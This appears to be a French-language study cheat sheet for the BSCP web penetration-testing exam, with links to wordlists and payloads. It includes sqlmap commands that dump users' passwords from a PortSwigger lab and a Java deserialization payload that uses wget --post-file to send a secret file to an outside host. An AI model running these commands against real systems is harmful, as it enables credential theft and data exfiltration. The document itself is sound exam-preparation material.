BSCP Certification - guide pratique

BSCP Certification - Cheat Sheet

La BSCP (Burp Suite Certified Practitioner) est une certification de PortSwigger qui valide des compétences avancées en tests d’intrusion d’applications web. Elle évalue la capacité à identifier et exploiter des vulnérabilités réelles en utilisant Burp Suite dans un environnement pratique. Cette certification est reconnue dans le domaine de la cybersécurité comme preuve d’expertise technique en sécurité offensive.

Burp Suite — Scan (rappels)

Scan du domaine complet
Repérer / tester les points d’injection directement dans Repeater

SSRF — repère rapide

Cible locale : localhost:6566

Ressources / listes utiles

Cheatsheets XSS

Cross-Site Scripting (XSS) Cheat Sheet - 2026 Edition | Web Security AcademyWebSecAcademy

usernames

Authentication lab usernames | Web Security AcademyWebSecAcademy

passwords

Authentication lab passwords | Web Security AcademyWebSecAcademy

wordlists

Burp-Suite-Certified-Practitioner-Exam-Study/wordlists at main · botesjuan/Burp-Suite-Certified-Practitioner-Exam-StudyGitHub

payloads

Burp-Suite-Certified-Practitioner-Exam-Study/payloads/README.md at main · botesjuan/Burp-Suite-Certified-Practitioner-Exam-StudyGitHub

sqli

SQL injection cheat sheet | Web Security AcademyWebSecAcademy

sqlmap

Payload scan

sqlmap -u "https://<TARGET_HOST>/filtered_search?find=&organize=5&order=ASC&BlogArtist=" \
  -p order \
  --level=5 \
  --risk=3 \
  --batch \
  --threads=10 \
  --cookie="session=<SESSION_COOKIE_VALUE>; _lab=<LAB_COOKIE_VALUE>"

-dbms=db_type --force-dbms

Example scan

sqlmap -u "https://0a1400b40315d2b281a58fd100800004.web-security-academy.net/filtered_search?find=&organize=5&order=ASC&BlogArtist=" \
  -p order \
  --level=5 \
  --risk=3 \
  --batch \
  --threads=10 \
  --sql-query="SELECT password FROM users WHERE username='administrator'" \
  --dbms=PostgreSQL --force-dbms
  --cookie="session=wQNQm4WZ02ejWneR9Pk9jLFj0CyhL6ZK; _lab=46%7cMCwCFFlBvtBGUO72q7EOE9BRElfWPqyZAhQU6FcgzznQodiX5Tl8CsBk3Z%2bI9k1Wq1bc8fahR4IhUOCdfA1mZQupxKDL9hIHaaFhDD0pHN7AryzO0yL91mmU7MQwQB36UQhzJXMmld2gz%2byaV%2fPoyNwaSVS5yLQREbtaTXV15Kv05MM%3d"

--columns -T users -D public

--dump -T users -C username,password

methodology

Burp-Suite-Certified-Practitioner-Prep/Methodology.md at main · TheGetch/Burp-Suite-Certified-Practitioner-PrepGitHub

java désérialisation (java 8)

CommonsCollections6 '/usr/bin/wget --post-file /home/carlos/secret https://...'

Hypothèses de comportement (labs)

Chaque application n’a au maximum qu’un seul utilisateur actif, connecté soit en user, soit en admin.
Cet utilisateur revient sur la page d’accueil toutes les 15 secondes.
Il clique sur tous les liens présents dans les e-mails envoyés par l’application.
Le serveur d’exploitation et sa fonction “send to victim” peuvent servir à viser des failles réfléchies (reflected).

Mis à jour il y a 8 jours

hashtagBSCP Certification - Cheat Sheet

hashtagBurp Suite — Scan (rappels)

hashtagSSRF — repère rapide

hashtagRessources / listes utiles

hashtagHypothèses de comportement (labs)

BSCP Certification - Cheat Sheet

Burp Suite — Scan (rappels)

SSRF — repère rapide

Ressources / listes utiles

Hypothèses de comportement (labs)